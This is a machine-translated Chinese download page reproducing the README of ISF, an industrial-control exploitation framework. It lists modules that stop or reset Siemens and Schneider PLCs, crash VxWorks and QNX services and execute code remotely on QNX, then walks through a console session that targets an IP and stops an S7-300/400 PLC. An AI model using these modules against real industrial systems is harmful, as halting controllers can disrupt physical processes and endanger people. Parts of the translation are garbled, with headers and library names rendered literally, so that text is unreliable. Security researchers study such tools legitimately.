isf下载 - isf源码下载

国际安全联合会

其他源码

ve release

下载

工业开发框架

ISF（工业开发框架）是一个基于Python的开发框架，它类似于metasploit框架。

ISF 基于开源项目 routersploit。

阅读其他语言版本：英语、简体中文、

免责声明

未经双方事先同意，使用 ISF 攻击目标是非法的。最终用户有责任遵守所有适用的地方、州和联邦法律。开发者不承担任何责任，也不对本程序造成的任何误用或损坏负责。

ICS 协议客户端

姓名	小路	描述
modbus_tcp_客户端	icssploit/客户端/modbus_tcp_client.py	Modbus-TCP 客户端
wdb2_客户端	icssploit/客户端/wdb2_client.py	WdbRPC 版本 2 客户端(Vxworks 6.x)
s7_客户端	icssploit/客户端/s7_client.py	s7comm客户端(S7 300/400 PLC)

漏洞利用模块

姓名	小路	描述
s7_300_400_plc_control	漏洞利用/plcs/siemens/s7_300_400_plc_control.py	S7-300/400 PLC启动/停止
s7_1200_plc_control	漏洞利用/plcs/siemens/s7_1200_plc_control.py	S7-1200 PLC启动/停止/复位
vxworks_rpc_dos	漏洞/plcs/vxworks/vxworks_rpc_dos.py	Vxworks RPC远程dos（CVE-2015-7599）
量子_140_plc_control	漏洞利用/plcs/schneider/quantum_140_plc_control.py	施耐德Quantum 140系列PLC启动/停止
crash_qnx_inetd_tcp_service	漏洞利用/plcs/qnx/crash_qnx_inetd_tcp_service.py	QNX Inetd TCP 服务 dos
qconn_remote_exec	漏洞利用/plcs/qnx/qconn_remote_exec.py	QNX qconn 远程代码执行
Profinet_设置_IP	漏洞利用/plcs/siemens/profinet_set_ip.py	Profinet DCP 设备 IP 配置

扫描模块

姓名	小路	描述
Profinet_dcp_scan	扫描仪/profinet_dcp_scan.py	Profinet DCP 扫描仪
vxworks_6_scan	扫描仪/vxworks_6_scan.py	Vxworks 6.x 扫描仪
s7comm_scan	扫描仪/s7comm_scan.py	S7通讯扫描仪
enip_scan	扫描仪/enip_scan.py	以太网IP扫描仪

ICS 协议模块（Scapy 模块）

这些协议可以在其他 Fuzzing 框架（如 Kitty）中使用或创建您自己的客户端。

姓名	小路	描述
PN_DCP	icssploit/协议/pn_dcp	Profinet DCP 协议
modbus_tcp	icssploit/协议/modbus_tcp	Modbus TCP 协议
WDBRPC2	icssploit/协议/wdbrpc2	WDB RPC 版本 2 协议
s7通讯	icssploit/协议/s7comm.py	S7通讯协议

安装

Python 要求

gnureadline（仅限 OSX）
要求
帕拉米科
美丽汤4
pysnmp
python-nmap
scapy 我们建议使用此官方文档安装 scapy 手册

在卡利上安装

 git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py

用法

    root@kali:~/Desktop/temp/isf# python isf.py
    
      _____ _____  _____ _____ _____  _      ____ _____ _______
     |_   _/ ____|/ ____/ ____|  __ | |    / __ _   _|__   __|
       | || |    | (___| (___ | |__) | |   | |  | || |    | |
       | || |     ___ \___ |  ___/| |   | |  | || |    | |
      _| || |____ ____) |___) | |    | |___| |__| || |_   | |
     |__________|_____/_____/|_|    |__________/_____|  |_|
    
    
                    ICS Exploitation Framework
    
    Note     : ICSSPOLIT is fork from routersploit at
               https://github.com/reverse-shell/routersploit
    Dev Team : wenzhe zhu(dark-lbp)
    Version  : 0.1.0
    
    Exploits: 2 Scanners: 0 Creds: 13
    
    ICS Exploits:
        PLC: 2          ICS Switch: 0
        Software: 0
    
    isf >

功绩

 isf > use exploits/plcs/
exploits/plcs/siemens/  exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (S7-300/400 PLC Control) >

您可以使用 Tab 键完成。

选项

显示模块选项：

 isf (S7-300/400 PLC Control) > show options

Target options:

   Name       Current settings     Description
   ----       ----------------     -----------
   target                          Target address e.g. 192.168.1.1
   port       102                  Target Port


Module options:

   Name        Current settings     Description
   ----        ----------------     -----------
   slot        2                    CPU slot number.
   command     1                    Command 0:start plc, 1:stop plc.


isf (S7-300/400 PLC Control) >

设置选项

 isf (S7-300/400 PLC Control) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}

运行模块

 isf (S7-300/400 PLC Control) > run
[*] Running module...
[+] Target is alive
[*] Sending packet to target
[*] Stop plc
isf (S7-300/400 PLC Control) >

显示有关漏洞利用的信息

 isf (S7-300/400 PLC Control) > show info

Name:
S7-300/400 PLC Control

Description:
Use S7comm command to start/stop plc.

Devices:
-  Siemens S7-300 and S7-400 programmable logic controllers (PLCs)

Authors:
-  wenzhe zhu 

References:

isf (S7-300/400 PLC Control) >